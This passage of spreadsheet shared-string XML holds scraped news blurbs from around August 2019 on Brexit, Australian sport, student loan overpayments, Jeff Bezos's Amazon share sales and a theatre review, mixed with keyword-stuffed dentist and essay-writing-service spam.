Holyrood are every bit as disturbed as the rest of the country by Brexit itself, and by the dangerous No Deal agenda of Boris Johnson. “Ruth may be have unable to foster any kind of rational politics inside the Conservative Party, but she is at least due some credit now for ending the pretence and resigning as party leader, and at a personal level I wish her well for the future.”</t>
  </si>
  <si>
    <t>Based on North coach Rhyce Shaw's praise for his star veterans after beating Hawthorn, it would be surprising to see any of them playing elsewhere in 2020.</t>
  </si>
  <si>
    <t>THE IRISHMAN release date for Netflix and cinemas have been announced, including the epic runtime of Martin Scorsese’s new gangster movie, which is considerably longer than Avengers Endgame. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>Android Authority The post HBO not working? Here’s how to fix HBO Go and HBO Now appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Icelanders are mourning the loss of the Okjokull glacier, which used to stretch 15 square kilometres, apparently due to the effects of global warming.</t>
  </si>
  <si>
    <t>Lamar Odom’s new girlfriend is apparently no angel. Just hours after the former NBA player went official with new girlfriend Sabrina Parr, a report emerged that Parr had some legal troubles in her past. As Radar Online reported, the fitness coach and former athlete was convicted of attacking her ex-husband with a trophy during a heated argument and ended up spending months behind bars. As the report noted, Parr told investigators that her husband found her two cell phones and began reading text messages between her and other men, prompting him to tell Parr that he was divorcing her. She said that he grabbed her and threw her against a wall as he tried to choke her, prompting Parr to grab a trophy and hit her ex-husband. Click here to continue and read more… The Inquisitr</t>
  </si>
  <si>
    <t>Cally Dupe</t>
  </si>
  <si>
    <t>One of the WA cattle industry’s brightest young stars Lucy Morris, 25, has been named among six national finalists in the Young Lot Feeder of the Year Award.</t>
  </si>
  <si>
    <t>Will Hazell</t>
  </si>
  <si>
    <t>More than £28 million in unclaimed student loan over-payments is sitting in government coffers, it has been revealed. Over a nine-year period, more than half a million former students in England overpaid on their loans, paying on average nearly £600 more than they owed, according to Student Loans Company (SLC) data. The figures, obtained by Research Professional News, show that while much of the £308 million overpaid has been paid back to graduates, almost a tenth (£28.5 million) is yet to be returned. The SLC said they pro-actively contact everyone who overpays to arrange refunds and that to improve its systems, it has started to receive payment information from HMRC. Loan repayments The data shows that between 2009-10 and 2017-18, a total of £307,821,092 was overpaid. Of this, £28,460,095 has not yet been refunded. The figures also show that between these years, 513,134 people in total had overpaid, and the average repayment was £597. Over-payments are made due to the way information is shared about loan repayments. Read More: The only instance you shouldn’t rush to pay off a £22,000 debt SLC normally receives repayment information annually, at the end of the tax year in April. But this means that if an individual repaid their loans during the tax year, for example in November, they will have been making over-payments for the rest of that tax year. An SLC spokesman said: “We want all customers to repay the right amount and not to over-repay on their loan.” He said that the company writes to those in the last two years of their repayments suggesting they can pay by direct debit rather than through their employer to help prevent over-repayments. The spokesman added: “We pro-actively contact all customers that have over-repaid to make arrangements for a refund; customers who do not participate in the direct debit scheme can also claim a refund at any time by contacting us. “We urge all customers to keep their contact details up-to-date so that we can contact them at the appropriate time about the direct debit scheme.” ‘Contact the SLC to seek a refund’ The spokesman also said that to improve its repayment system, the SLC has started to receive payment information from HMRC that will “help to prevent customers from over repaying and provide them with more up-to-date information about their loan repayment”. A government spokesman said action had been taken to help prevent future over-payments. “This included changing the law in April to allow weekly data sharing between HMRC and the Student Loans Company, which will help to prevent graduates repaying too much,” he said. “If a borrower believes there has been an over repayment, they should contact the SLC to seek a refund.” More From Education GCSE grade boundaries 2019: what time they are released on results day, and where to find AQA, OCR and more YouTube aims high in streaming war with philosophy and science series Here's everything you need to know about GCSE results day 2019 GCSE reforms: EBacc 'squeezed out' arts and 'should be scrapped' Students are avoiding alcohol - is this the end of bizarre uni drinks? Quiet at the back! Why noise in school is the enemy of learning The post Graduates overpaying as much as £600 per person after student loans paid off appeared first on inews.co.uk. The post Graduates overpaying as much as £600 per person after student loans paid off appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Police said the suspect resided in Waterloo Region at the time of the incidents in 2013 and 2017.</t>
  </si>
  <si>
    <t>Materials used in manufacturing and companies’ efforts to collect and charge scooters create significant greenhouse gas emissionsAt first glance, the assertion that dockless electric scooters are more environmentally friendly than other modes of transportation seems sound. They don’t emit greenhouse gases. They don’t add to vehicle congestion. “Cruise past traffic and cut back on CO2 emissions – one ride at a time,” touts Bird, one of the most popular scooter companies in the US.But scooters are not as eco-friendly as they may seem, according to a study published Friday. Continue reading… Read More</t>
  </si>
  <si>
    <t>Sydney have sent off retiring legends Jarrad McVeigh and Kieren Jack as winners with an emotional 45-point victory over St Kilda.</t>
  </si>
  <si>
    <t>Kerri-Anne Kennerley doesn't believe WHO running the wrong photo of Adut Akech was racist, but just a simple mistake.</t>
  </si>
  <si>
    <t>If the ultimate goal is a healthy economy, the Fed should stop playing along with Donald Trump.</t>
  </si>
  <si>
    <t>⇘ Pre-save "Sine Language": https://presave.io/t/sinelanguage ● Subscribe for more: http://bit.ly/TheDubRebellionYT → Wolf-e-Wolf Tweets by wolfewolfmusic http://www.instagram.com/wolfewolfmusic http://www.facebook.com/wolfewolfmusic → 19k Tweets by 19ksounds http://www.instagram.com/19ksounds http://www.facebook.com/19ksounds → The Dub Rebellion http://www.facebook.com/officialrebellion http://www.instagram.com/darekrebellion Tweets by thedubrebellion http://www.discord.gg/thedubrebellion http://www.facebook.com/groups/737823163272960 http://www.thedubrebellion.bigcartel.com The post Wolf-e-Wolf – Wildchild appeared first on Dubster.</t>
  </si>
  <si>
    <t>We specialize in a wide range of dental services and do most of our treatments in-house virtually eliminating the need for specialist referrals. Our clinic is an excellent choice if you are looking. West Airdrie Dentist Alberta | Dr. Justin Navigation Home About Our Team Virtual Tour Services General Dentistry. Sedation DENTAL IMPLANTS Cosmetic Periodontics Orthodontics INVISALIGN Oral and Body Health Dentist Near Me Free Dental Consulta. Technology is Critical to Modern Dental Care: Choose Carefully – Why &amp; How an Outdated Dental Clinic. yet near to being complete, let alone the multiple diseases and conditions are still. Most Popular Dentist In Airdrie Nose Creek Regional Park, with its iconic totem poles, and Chinook Winds Regional Park are some of the city's most popular green spaces. The Future of Airdrie. Cosmetic Dentist In Airdrie Alberta Kid Friendly Dental Clinic In Airdrie Most Popular Dr. Arman Sonuhi is a general dentist in Airdrie providing children &amp; adults with preventive &amp; cosmetic dentistry services such as dental implants &amp; Invisalign. Creekside Dental Care also provide root canals, wisdom tooth extractions &amp; emergency dentistry in Airdrie. Friendliest Dental Clinic Near Airdrie Alberta Most Popular Dentist In Airdrie Nose Creek Regional Park, with its iconic totem poles, and Chinook Winds Regional Park are some of the city's most popular green spaces. The Future of Airdrie. Cosmetic Dentist In Airdrie Alberta Kid Friendly Dental Cosmetic Services We believe that having a friendly and healthy smile can positively affect your confidence. Most Popular Dental Clinic Near Airdrie Alberta Kid Friendly Dental Clinic In Airdrie Alberta Recent Comments Archives August 2019. “It’s just absolutely shocking,” he said. Women near the Cosmetic Dental Clinic agreed it was a bit scary to see cordons and. Hubert Ng, D.M.D. Dr. Hubert Ng, D.M.D has been part of Airdrie Springs Dental since 2007.Dr. Hubert was born and raised in Calgary. He completed his undergraduate studies at the University of Calgary, with honors degrees in both Biological Sciences and Commerce. Vicki Vicki has been with Airdrie Springs Dental since September 2015. She provides services as a Registered Dental Hygienist.When not in the dental clinic, Vicki enjoys running, interval training, playing soccer, hanging with her family, Dentist Couple Built Their Dental Practice in New Jersey – Silman’s Smiles Spas are dedicated to providing the best possible dental service to Northeastern New Jersey individuals and their families. They perform general dentistry services as well as. Dr. Rahul Mathur is a general dentist in Airdrie 8th Street Dental Clinic conveniently located at 201-1 Midtown Blvd SW, General Dental Services, and Dentistry for Children. We also provide Cosmetic (Restorative) Dentistry, Emergency. Welcome to South Airdrie Smiles. South Airdrie Smiles is our family’s smile experts. From promoting a positive oral health environment for kids to treating complex dental needs in adults, we have everything that you need. Visit our passionate dental professionals today. General Dentistry. Great oral health begins at home and ends in a dentist’s chair! Our dentists will help you stay on track with gentle preventive care visits. Your children need to have regular dental exams, too. Bring them to West Airdrie Dental for a relaxed “meet and greet” with the dentist! Airdries Newest Dental Clinic is Now Open – Get in touch today to book your appointment, walk-ins available Airdrie Dentists Now Accepting New Patients!. The Best Cosmetic Dentists in Airdrie Handpicked Top 3 Cosmetic Dentists in Airdrie, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence.You deserve only the best!</t>
  </si>
  <si>
    <t>An individual might say it’s impossible, but it has never been simpler to get dissertations online. Whether you’re publishing or ordering a dissertation or thesis, ProQuest is the sole partner you will want. In addition, it’s not as understandable not to. In spite of the subject of dissertation, he needs to collect the data. Dissertation examples are written dissertations that may act as a guide. In the end, your dissertation will grow into one of your greatest-ever achievements. Writing primary homework help dissertation isn’t a simple task. Vital Pieces of Uk Essay Dissertation If you are looking for a professional UK assignment writing service that you could always rely on you’ve come to the correct location! Now you understand that an honest and qualitative on-line essay writing service might provide great assistance for your learning, it’s time to put your order. Our assignment help providers supply each one of the students with professional academic support and with an chance to purchase assignment online. The Uk Essay Dissertation Pitfall Only experienced, degreed writers are part of our team to offer original papers for every single customer. If you fret about having the ability www.uk.grademiners.com/homework-help to complete assignments by a specific deadline, our writers will be in a position to set you at ease with their efficient and punctual work. So if you’re planning to find top grades in your essays then you’ve arrived at the proper spot. New Step by Step Roadmap for Uk Essay Dissertation A finance dissertation proposal needs to be written with a crystal clear grasp of the subject as you will need to present it clearly and comprehensibly, something which even your colleagues can understand. If you are searching for assistance with your methodology then we provide a comprehensive writing service offered by fully qualified academics in your area of study. With the most brilliantly written dissertation methodology examples, the students may check out what kind of paper they’ll get and they are able to put the order only as long as they like the samples. You then need to move on to talk about your research questions, and the way you intend to deal with every one of them. You might begin with a problem statement, especially if your research addresses a practical issue. Your research https://www.cwa.edu.gh/ might even aim to check the research strategies, to see whether they work in some specific circumstances. The Number One Question You Must Ask for Uk Essay Dissertation You are able to share your dissertation ideas with our writing exxperts and they can give you the very best high quality paper immediately. It’s great and happy to get my paper free of plagiarism and error. You just need to look at our dissertation writing reviews to find the fact of that statement. A literature review discusses information in a specific subject which has been published. Our essays are written from scratch in order to prevent plagiarism. Thus, your essay isn’t going to be late for the submission and you’ll always make it to the moment. When searching for somebody to compose your essay, having someone who’s an expert work on it’s important. After all, a project is referred to as the toughest task on the planet. It is designed to be simple and painless so you won’t be frustrated or upset trying to get your paper taken care of. There are a number of other fantastic benefits of using professional, dissertation-writing services. Our business enterprise assignment writing services are supplying you with the top quality work in time. Our service will give you with help for writing a dissertation including all the above mentioned advantages. The principal concern for students in respect to buying the assistance of dissertation writing help on the internet is the trustworthiness of the content. It’s possible to also confirm from our live customer service representatives on availability of writers locally of study. There are many advantages that include using dissertation writing service websites. What You Don’t Know About Uk Essay Dissertation Obviously, a number of them are less excellent as others. Our diverse group of professional academic writers can manage any subjects. UK academics in over 50 subjects are readily available! It’s possible to order essay writing in all different forms just by visiting our site. Following that, you can get custom made essays online, delivered right to your email. Any essay you get from us is an original work that won’t ever be resold or given to some other individual. Our website is just one of the most appropriate for essay help. Our writing company is among the most preferred in UK. Our professional team offers you the very best essay help online!</t>
  </si>
  <si>
    <t>A suicide bombing at a wedding in Kabul, Afghanistan has killed at least 63 and injured more than 180 people. The Taliban have denied they were responsible for the bombing and have condemned the attack. Image: AP</t>
  </si>
  <si>
    <t>Aug. 14, 2019 UN Asks Palestinians to Explain Hate Speech, Anti-Semitism – Tovah Lazaroff The Palestinian Authority was called to task for hate speech and anti-Semitism in its official statements and in its textbooks during its first-ever review by the UN Committee on the Elimination of Racial Discrimination held in Geneva on Tuesday. “Several NGO reports pointed out anti-Semitic and anti-Israel prejudice and incitement to hatred, especially in the [Palestinian] media and speeches of state officials. Can the state party [the PA] provide any explanation in this regard?” asked committee member Chinsung Chung of South Korea. Committee member Silva Albuquerque said, “Our convention obliges state parties to adopt immediate and effective measures, particularly in education, to combat racial discrimination and prejudice between different racial and ethnic groups.” UN Watch Executive Director Hillel Neuer noted that the Palestinians “wanted to sign treaties and now they are being held to account.” (Jerusalem Post)</t>
  </si>
  <si>
    <t>NI has seen an 11% cut in spending per pupil since 2009, says the Institute for Fiscal Studies. The post NI faced highest cuts to school spending in UK, says IFS appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>nov</t>
  </si>
  <si>
    <t>On the weekend realized I need a portable hard drive. Checked at Officeworks site and there it is - the "Seagate 3TB Expansion Portable Hard Drive - Product Code: SGEXP3000" is still there. Bought it online - Click &amp; Collect. Late afternoon on Monday received a message that it is ready to be collected.</t>
  </si>
  <si>
    <t>Both of the social media platforms are currently blocked in China, but many of the accounts were able to receive access due to the use of VPNs, according to Twitter's statement.</t>
  </si>
  <si>
    <t>In the showdown between the winners of last season's two European club competitions, the Reds have prevailed in a game that went to extra-time and then spot kicks to find a winner.</t>
  </si>
  <si>
    <t>Sunrise personalities Samantha Armytage, David Koch, Edwina Bartholomew and Mark Beretta will be the first team to play The Celebrity Chase, coming to primetime on Seven. Offering cash for charities, these specials will begin on Wednesday next week. Host Andrew O’Keefe, said: “The great Carl Reiner once said that a brilliant mind in panic is a wonderful thing to see. That’s the beauty of these specials… the pressure to be brilliant can bring out the funniest, most unexpected sides of the people we think we know so well.” The Celebrity Chase isn’t just a quiz, it’s a race where the celebrities must ensure they stay one step ahead of the Chaser, one of the finest quiz brains in the world. Which Chaser will they face? The Supernerd, Goliath, The Shark, The Governess or The Beast? Rising to the challenge will be; Sunrise team – Sam, Kochie, Eddy and Beretts, Ricki-Lee, Joel Creasey, Derryn Hinch, Nazeem Hussain, Lucy Durack, Merv Hughes, Lauren Jackson AO, Anne Edmonds, Red Symons, Cal Wilson, Merrick Watts, Sarah Hanson Young, Yvie Jones, Simon Burke, Lawrence Mooney, Abbey Gelmi, Brendan “Jonesy” Jones, Lisa Curry, Kris Smith and Pete Rowsthorn will all have the chance to win money for the charity of their choice. Will they stay ahead of the Chaser and collect the cash pot or get caught and lose the lot? Teams of four will face a sequence of quick-fire and multiple-choice question rounds to build up their cashpot, but if they allow the Chaser to catch them, they are out of the game. Working together, players who make it through to the Final Chase then unite one more time before their common enemy: The Chaser. The Sunrise team, Samantha Armytage, David Koch, Edwina Bartholomew and Mark Beretta will be the first team to play the game. Will Sam know which terrestrial planet begins with a vowel? Does Kochie know what the text abbreviation YSK stands for? Can Edwina answer correctly in which world war was the Oscar winning film Kokoda Front Line produced? Will Mark Beretta’s sport knowledge serve him well answering – the term for which automatic car gear position also means a golf shot hit from a tee? Do they have what it takes to beat the Chaser? Wednesday, 21 August at 7.30pm on Seven.</t>
  </si>
  <si>
    <t>It’s party time at Mitch and Mark’s place and the neighbours aren’t happy.</t>
  </si>
  <si>
    <t>Zion Williamson Takes On Raptors, Clippers Duel Lakers Original Source The first wave of NBA “opening night” matchups has been leaked. Sources close to Shams Charania of The Athletic offered him an early look at the NBA’s opening night matchups. By the looks of it, basketball enthusiasts will be offered the chance to see Zion Williamson in action, right from the onset of the 2019-2020 season. The New Orleans Pelicans will reportedly be matched up against the Raptors for the inaugural tip-off (Oct. 22nd). If that’s not enough, the battle of Los Angeles is expected to take place on the very same night, in the Pacific time slot, of course. The Clippers and Lakers will get a chance to assert their dominance right from the start. They will play each another four times throughout the season, including a marquee matchup on the Christmas telecast. The “battle of Los Angeles” is set up in such a manner, an odd number of games- that only team can enter the postseason with bragging rights. Which begs the question: would home-court advantage give either side the edge in a prospective Western Conference finals matchup? Would the respective fanbases receive an even share of the tickets? Bear in mind, other matchups can and will be added to opening night, October 22nd. The NBA authenticated Sham Charania’s findings by posting the report themselves. Who else would you like to see strike first blood on the 22nd? Comment below. [Via] Follow us on Twitter Original Source The post Zion Williamson Takes On Raptors, Clippers Duel Lakers appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Dominic Powell</t>
  </si>
  <si>
    <t>Australia's largest retail company Wesfarmers has reported a 13.5 per cent increase in net profit after tax thanks to strong performances from Bunnings and Officeworks.</t>
  </si>
  <si>
    <t>Hammerhead27 posted a photo: Recent Uploads tagged river</t>
  </si>
  <si>
    <t>WATCH: The two-day forecast for Australia's 30 most populous cities.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Controlan incendio en fábrica de colchones en el norte de Cali Monday 05 August 2019 03:16 AM UTC-05 | Tags: credit-counseling https://firmadeabogadosmedellin.blogspot.com/p/vancouver-washington-consumer-credit.html Para atender esta emergencia fue necesaria la presencia de 50 unidades de los Bomberos. Hasta el momento no hay reporte de personas lesionadas. Tags: credit-counseling</t>
  </si>
  <si>
    <t>fredk1000</t>
  </si>
  <si>
    <t>Visited the local Officeworks (Five Dock NSW), 100 BIC pens for $5 There were a few boxes left but other stores may have them. 5c a pen. Considering they sell a 12 pack for almost the same price. Not sure what I am going to do with them all though, don't do much writing these days.</t>
  </si>
  <si>
    <t>ATLANTA FLACONS VS DENVER BRONCOS LIVE STREAM – How to watch the NFL Hall Of Fame Game online or on TV. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>A state-of-the-art Dental practice poised to serve the developing communities of Georgetown and the Halton Hills region. Our focus is patient-centered care, whereby the patient-Dentist relationship is rooted in communication, patient education. Cosmetic Dentist Near Halton Hills Ontario Best Dental Clinic Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Ontario Dentistry on Sinclair is Georgetown's most trusted, family-friendly dentistry. We've been providing comprehensive dental and oral health care for over 24 years. Best Dentists in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, Sunnyview Preferred Dentist Near Halton Hills Preferred Dental Clinic Near Halton Hills Best Dentists in Georgetown, Halton Hills, ON – South Georgetown Dental Care, Georgetown Denture Clinic, Diana Dental, Lefebvre Ronald, Mountainview Dental, Argyll Dental Office, Georgetown Dentistry, Trenton A W Denturist, Georgetown Dental. . Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Welcome to Marketplace Dental Centre, one of best dental Clinics in Georgetown, Ontario. Dr. Anoop Sayal and Associates have been proudly serving Georgetown and Halton Hills since 1994 and we warmly welcome you to join our family of patients. We. Locate and compare Dentists in Halton Hills Village Georgetown ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana M. Best Dental Clinic Near Halton Hills Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Market Place Dental Centre, Apple Dental, Pownall Janet, DDs – Still Waters Dental, King’s Cove Family Dental, Still Waters Dental Group, Kid Friendly Dentist Near Halton Hills Ontario Best Dentist in Halton Hills. RSS; Friendliest Dentist In Halton Hills. Number Best Dentists in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Market Place Dental Centre, Locate and compare Dentists in Halton Hills ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening.</t>
  </si>
  <si>
    <t>Kaylen Small</t>
  </si>
  <si>
    <t>A Cessna 305 with two people aboard "collided with terrain" on Saturday between 11:30 and 11:45 a.m., according to the Transportation Safety Board.</t>
  </si>
  <si>
    <t>After five years in control, rebels pull out of a strategic town in their last remaining province. The post Khan Sheikhoun: Syria rebels pull out of key town after five years appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Some artists only have one really big hit. [The YouTube] What’s been on your mind? Got something you’d like to share? A topic to discuss? It’s Saturday Night Open Thread. Who wants to start? 0 0</t>
  </si>
  <si>
    <t>Aspiring entrepreneurs pitched business ideas to expert investors in a mock trial run at the Okanagan Co-Lab on Thursday.</t>
  </si>
  <si>
    <t>Android Authority The post Dual-screen Nubia Z20 offers beefier chipset than Note 10 for half the price appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>A woman is killed and four people are injured after a cliff collapsed on popular southern California beach in Encinitas, north of San Diego.</t>
  </si>
  <si>
    <t>Ronald Reagan's daughter says there is "no suitable explanation" for her father calling African delegates to the United Nations "monkeys" in a 1971 phone conversation with then-US President Richard Nixon.</t>
  </si>
  <si>
    <t>Outgoing Newcastle Knights coach Nathan Brown has his regrets. He hasn't achieved what he wanted on the field but he has done so off it, claiming that the club had a huge culture problem when he arrived in 2016.</t>
  </si>
  <si>
    <t>HALIFAX – Preliminary results of an imaging survey near a Nova Scotia town where a sinkhole swallowed part of a park last summer show an extensive belt of hundreds of additional sinkholes stretching for kilometres. Amy Tizzard, a geologist with… The post Ground imaging shows large sinkhole chain near Nova Scotia town appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Perhaps nobody was more surprised to hear that China had called President Donald Trump's administration to restart trade talks than the government in Beijing itself.</t>
  </si>
  <si>
    <t>Major League Baseball's Miami Marlins have apologised for a tweet earlier in the week that used the death of famed Australian wildlife conservationist Steve Irwin to troll the Tampa Bay Rays.</t>
  </si>
  <si>
    <t>Hot Property</t>
  </si>
  <si>
    <t>Rodri Impresses in Opening Games Original Source Though he may be acclimating to his new club, Rodri has looked right at home in Manchester City’s squad so far in their opening three games. It’s been an impressive start for Manchester City’s record signing, defensive midfielder Rodri. Though he’s getting adjusted to life in a new club, and in what’s arguably the toughest league in the world to play in, he’s looked every bit as good as City were hoping he’d be when they brought him in this summer. Rodri’s debut in Manchester City’s opening game of the season against Liverpool in the FA Community Shield was solid. He did virtually everything Pep Guardiola would expect his holding midfielder to do. More from Man City Square He broke up attacks well, and his distribution and ball control was impressive. Though he did make a few mistakes on the ball, and looked fatigued by the final moments of the game, he checked all of the boxes that people hoped he would when it came to his core responsibilities. His performances in Manchester City’s opening two Premier League games have been even better. In City’s opening game of the Premier League season against West Ham, he posted a very good match rating of 7.78. He attempted 72 passes, second most on the team to Aymeric Laporte, and completed 90.3% of those attempts. Defensively, he managed two tackles, a clearance, and he won four aerial duels during the game. Only Laporte, once again, was ahead of him in aerial duels won. It was a fantastic performance for Rodri. He helped steady the ship for City when they were in possession. He also did a fantastic job of closing down space when West Ham tried to attack. His positioning and cover was a major part of the reason why West Ham were able to create almost nothing in attack throughout the game. He was also a vital defender on set-pieces, something City has struggled with in the past. Want your voice heard? Join the Man City Square team! Write for us! Against Spurs this past weekend, he had a bit of an under-the-radar performance. Though his match rating wasn’t quite as high as the opening game of the season against West Ham (7.27), he was still Manchester City’s fourth best performer overall. In attack he attempted 57 passes, but completed 98.3% of his attempts. This included contributing two key passes that led to goal-scoring chances for the team. In defense, he led the team in tackles (four) and tied for the lead in interceptions (two). He also executed two clearances, and won three aerial duels (second to Nicolas Otamendi who won six). Like the week prior, his work on both sides of the ball steadied the ship for the team. He helped project a calmness and confidence when City were on the ball. When they were defending. he did an excellent job of breaking up several Tottenham attacks, especially when they tried to go through the middle of the pitch. His marking on Christian Erickson, in particular, was something to behold. Erickson is one the best attacking midfielders in the world. Rodri made Erickson look completely anonymous throughout the game. It’s been an amazing start for him at the club. Though he’s only three games into his Manchester City career, Rodri already looks he’s been in the squad for years. He’s executing his job at near perfection. Next: Manchester City Fans and VAR If this is any sign of what’s to come, City could be even better this season than they’ve been in the past two. That’s bad news for everyone else in the Premier League and in Europe.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Rodri Impresses in Opening Games appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Here are the inside stories of how former Wallabies legends broke the news to the current crop of players they would be on the plan to Japan for the World Cup.</t>
  </si>
  <si>
    <t>Santa Cruz’s Karissa Cook and the USA women’s snow volleyball team was ousted 15-9, 8-15, 15-13 by Argentina No. 1 in the quarterfinals Saturday …</t>
  </si>
  <si>
    <t>Fife Police are appealing for the public's help to trace a man who has been reported missing from the Buckhaven area of Fife.</t>
  </si>
  <si>
    <t>How we come together and what drives us apart are the overlapping themes in “Summer Shorts 2019: Series B,” a patchy evening of three short plays — running in repertory with “Series A” — at 59E59 Theaters. In Sharr White’s “Lucky,” a husband and wife reunite after years estranged; in Nancy Bleemer’s “Providence, a young married couple treat a case of wedding jitters; and in Neil LaBute’s “Appomattox,” two friends discuss racial reparations. In “Lucky,” set in the late 1940s, Phil (Blake DeLong) has returned to his hometown after six years away. A former soldier, he left for the war and never came back, deserting his young wife, Meredith (Christine Spang). And now, on an implausibly rainy night — it has soaked the inside of her handbag, but not her shoes or coat — she has tracked him down. This is a fine subject for a drama, but Mr. White’s script, which has Phil answer in blank monosyllables, feels factitious and stagy. (J. J. Kandel’s stiff direction doesn’t help.) The play is at its most moving in its final moments, when the characters finally touch each other Ms. Bleemer’s airy “Providence,” begins with a present-day couple already entwined. Renee (Blair Lewin) and Michael (Jake Robinson), in town for his sister’s wedding, have crammed into his childhood bed. But they can’t sleep, and neither can Pauly (Nathan Wallace), the groom-to-be. In reassuring Pauly and making cracks about Tampax and capons, Renee and Michael discover fissures within their own relationship. Ms. Bleemer’s playlet, directed by Ivey Lowe, is sweet, but not exactly weighty, as insubstantial as Michael’s much-laundered comforter. Trust Mr. LaBute, an expert in the short form, to have more a consequential topic in mind. But Mr. LaBute is a Summer Shorts regular, and the better you know his plays, the less provocative you may find them. “Appomattox,” gamely directed by Duane Boutté, kicks off when Joe (Jack Mikesell) and Frank (Ro Boddie), old friends who like to meet for a protein-heavy picnic and a game of catch, find themselves discussing a plan, devised by Georgetown University freshmen, to repay the descendants of men and women the school had sold as slaves. Joe, who is white, finds the gesture moving; Frank, who is black, sees it as gesture, merely, and an inadequate one. They argue about what appropriate reparations would look like: Who should be paid, and how much? There’s some decent back and forth until one character pushes too far (typical of Mr. LaBute) with a proposition that presents a woman as something less than a fully formed subject (also typical of Mr. LaBute). Then again, Joe and Frank don’t demonstrate much depth of character either. We learn nothing about their lives, other than that Joe wears Brooks Brothers shirts, an excuse for a reasonably interesting history lesson about current corporations that once profited from slavery. Joe is callow, Frank is angry — distinctions that verge on stereotype, then fall right in. “Every man has a price,” Frank says. Mr. LaBute’s seems increasingly cheap. Summer Shorts 2019: Series B Through Aug. 31 at 59E59 Theaters, Manhattan; 646-892-7999, 59e59.org. Running time: 1 hour 30 minutes. Source link</t>
  </si>
  <si>
    <t>Police say a female was assaulted and had her phone cellphone stolen early Wednesday.</t>
  </si>
  <si>
    <t>The Northcote 250, by Burbank, is a first-home buyer delight that celebrates space and light.</t>
  </si>
  <si>
    <t>An embarrassing public tantrum has set into motion the take-down of one controversial Bachelor contestant who is exposed as a “compulsive liar” on Wednesday night.</t>
  </si>
  <si>
    <t>More than 100 Muslims from Australia to Tanzania are contributing to a Twitter hashtag #boycotthajj in response to Saudi Arabia's political record.</t>
  </si>
  <si>
    <t>"Black Ops V" is out Aug 26th on NSD: Black Label! Presave on Spotify ➤ https://NSD.presave.io/t/nsdbo005 Want more? Check out all our releases on Spotify ➤ http://nsdx.uk/NSDBLSpotify —————————————— Never Say Die Playlists ➤ NSD Weekly - http://nsdx.uk/NSD-Weekly NSD New Music - http://nsdx.uk/NSD-NewMusic NSD Mixes - http://nsdx.uk/NSD-Mixes NSD Top Hits - http://nsdx.uk/NSD-TopHits NSD Dubstep Selections - […] The post Jkyl &amp; Hyde – Broadcast VIP appeared first on Dubster.</t>
  </si>
  <si>
    <t>Billionaire Jeff Bezos sold almost 1 million Amazon shares worth $1.8 billion in late-July 2019, reducing his net worth to $115 billion. | Source: REUTERS / Katherine Taylor / File Photo Amazon founder Jeff Bezos sold almost 1 million Amazon shares worth $1.8 billion in the last three days of July in three separate transactions. The sales reduced Bezos’ stake in Amazon to about $110 billion. According to an SEC filing, Bezos sold 960,000 Amazon shares for $1,900 a share from July 29 to July 31 in three tranches. After the sales, Bezos still owns 58.1 million Amazon shares and remains the online retailer’s largest individual shareholder. Billionaire Bezos sold $1.8 billion in Amazon stock during the last three days of July 2019. | Source: SEC filing Mackenzie Bezos is now Amazon’s second-largest shareholder Jeff’s ex-wife, MacKenzie Bezos, is now Amazon’s second-largest individual stakeholder pursuant to the couple’s April 2019 divorce settlement. Under that agreement, MacKenzie took $35.6 billion in Amazon stock and left Jeff with 75% of their joint AMZN holdings, as well as voting control of her shares. After her lucrative divorce, MacKenzie Bezos became the fourth-richest woman in the world. Not surprisingly, MacKenzie said she was “happy” with her settlement and was excited to start a new chapter in her life following the dissolution of her 25-year marriage. pic.twitter.com/OJWn3OOLS6 — MacKenzie Bezos (@mackenziebezos) April 4, 2019 Bezos will sell $1 billion in Amazon stock every year to fund space company The latest sale of 960,000 Amazon shares is Jeff Bezos’ first since October 2018, when he sold $33 million in AMZN. The move is not a surprise. In 2017, Bezos said he would sell $1 billion in Amazon stock every year to finance his spaceflight company, Blue Origin, whose goal is to explore and colonize space. “My business model right now for Blue Origin is, I sell about a billion dollars a year of Amazon stock, and I use it to invest in Blue Origin,” Bezos said in 2017. “So the business model for Blue Origin is very robust.” Even with the latest divestment, Jeff Bezos’ net worth still tops $117 billion, according to the Bloomberg Billionaires Index. Amazon founder Jeff Bezos’ net worth tops $117 billion. | Source: Bloomberg Space wars heat up between Elon Musk and Jeff Bezos As CCN reported, Tesla billionaire Elon Musk mocked Bezos as a copycat in April amid news that the Amazon founder plans to launch 3,200 satellites into space. Bezos’ venture is called Project Kuiper, and its goal is to provide high-speed internet service to millions of people in underprivileged communities. Bezos revealed his plans in federal filings from March 2019. Musk 